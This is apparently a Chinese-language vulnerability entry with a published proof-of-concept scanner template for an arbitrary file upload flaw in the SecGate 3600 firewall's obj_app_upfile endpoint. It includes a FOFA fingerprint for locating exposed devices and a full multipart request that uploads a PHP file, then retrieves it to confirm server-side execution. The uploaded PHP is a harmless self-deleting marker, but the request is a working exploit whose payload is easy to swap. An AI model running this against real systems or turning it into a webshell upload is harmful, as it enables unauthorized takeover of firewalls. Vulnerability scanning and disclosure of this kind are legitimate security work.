漏洞描述
网神 SecGate 3600 防火墙 obj_app_upfile接口存在任意文件上传漏洞,攻击者通过构造特殊请求包即可获取服务器权限
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
secworld-secgate3600-objappupfile-uploadfile: 网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞
PoC代码[已公开]
id: secworld-secgate3600-objappupfile-uploadfile
info:
name: 网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞
author: zan8in
severity: critical
verified: true
description: |
网神 SecGate 3600 防火墙 obj_app_upfile接口存在任意文件上传漏洞,攻击者通过构造特殊请求包即可获取服务器权限
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
reference:
- https://peiqi.wgpsec.org/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E7%A5%9E%20SecGate%203600%20%E9%98%B2%E7%81%AB%E5%A2%99%20obj_app_upfile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
tags: secworld,uploadfile
created: 2023/08/09
set:
r1: randomLowercase(4)
r2: randomInt(40000, 44800)
r3: randomInt(40000, 44800)
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /?g=obj_app_upfile
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\
\r\n\
10000000\r\n\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"upfile\"; filename=\"{{r1}}.php\"\r\n\
Content-Type: text/plain\r\n\
\r\n\
<?php echo {{r2}}*{{r3}};unlink(__FILE__);?>\r\n\
\r\n\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"submit_post\"\r\n\
\r\n\
obj_app_upfile\r\n\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"__hash__\"\r\n\
\r\n\
0b9d6b1ab7479ab69d9f71b05e0e9445\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: response.status == 302
r1:
request:
method: GET
path: /attachements/{{r1}}.php
expression: response.status == 200 && response.body.bcontains(bytes(string(r2 * r3)))
expression: r0() && r1()